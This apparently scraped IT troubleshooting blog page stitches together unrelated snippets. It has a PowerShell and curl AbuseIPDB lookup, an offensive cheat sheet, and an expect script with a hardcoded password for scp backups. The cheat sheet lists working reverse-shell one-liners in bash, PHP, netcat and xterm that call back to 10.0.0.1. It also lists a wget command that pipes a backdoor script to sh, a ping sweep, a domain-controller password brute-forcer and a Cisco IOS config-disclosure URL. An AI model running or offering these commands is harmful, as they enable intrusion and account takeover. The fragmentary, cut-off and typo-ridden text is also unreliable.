3C健忘人 - 疑難排除不求人 - no more ask for IT help

#Powershell version $myparams = @{ ipAddress="xxx.xxx.xxx.xxx" maxAgeInDays="90" verbose="verbose" } $myheaders = @{ Key = "your API Key of AbuseIPDB" Accept="application/json" } $result = (Invoke-WebRequest -uri https://api.abuseipdb.com/api/v2/check -Method get -ContentType application/x-www-form-urlencode -Body $myparams -Headers $myheaders) $obj=(ConvertForm-Json $result) write-host "---------------------------------------------------------------" write-host  "IP: " $obj.data.ipaddress write-host  "Domain: "$obj.data.domain write-host "Country: "$obj.data.countryName write-host "ISP: "$obj.data.isp write-host "AbuseConfidenceScore: "$obj.data.abuseConfidenceScore"%" write-host "------------------------------------------------------------" #Curl version: Ex1. from AbuseIPDB document curl -G https://api.abuseipdb.com/api/v2/check \ --data-urlencode &q

 wget http://<hacked server>/backdoor.sh -O | sh xterm xterm -display 10.0.0.1:1 @ start listener: xnest :1 @add permission to connect: xhost +victimIP php php -r '$sock=fsockopen("10.0.0.1",1234);exec("/bin/sh -i <&3 >&3 2>&3"); ' Bash bash -i >& /dev/tcp/10.0.0.1/880 0>&1 netcat nc 10.0.0.1 1234 -e /bin/sh nc 10.0.0.1 1234 -e cmd.exe

 for /L %i (10,1,254) do @ (for /L %x in (10,1,254) do @ ping -n 1 -w 100 10.10.%i.%x 2>nul | find "Reply" && echo 10.10.%i.%x >> alive_ip.txt Domain brute forcer for /F %n in (names.txt) do for /F %p in (pawds.txt) do net use \\DC01\IPC$ \\DC01\IPC$ > NUL dns reverse lookup for /L %i in (100,1,105) do @ nslookup 1.1.1.%i | findstr /i /c:"Name" >> dns.txt && echo Server: 1.1.1.%i >> dns.txt CISCO IOS 11.2-12.2 http://<ip>/level/<16-99>/exec/show/config

# from QRadar EP terminal ssh-keygen -t rsa ssh-copy-id user@AIX. # not work ## then we try to use expect program method # touch scp.exp and input content of follows  #!/usr/bin/expect set filename [lindex $argv 0] spawn scp  -r $filename user@AIX:~ expect {  "(yes/no)?" { send "yes\n"}  "*password:" { send "yourpass\n";exp_continue} } interact expect eof #touch backup.sh for filename in $(ls *) do ./scp.exp $filename done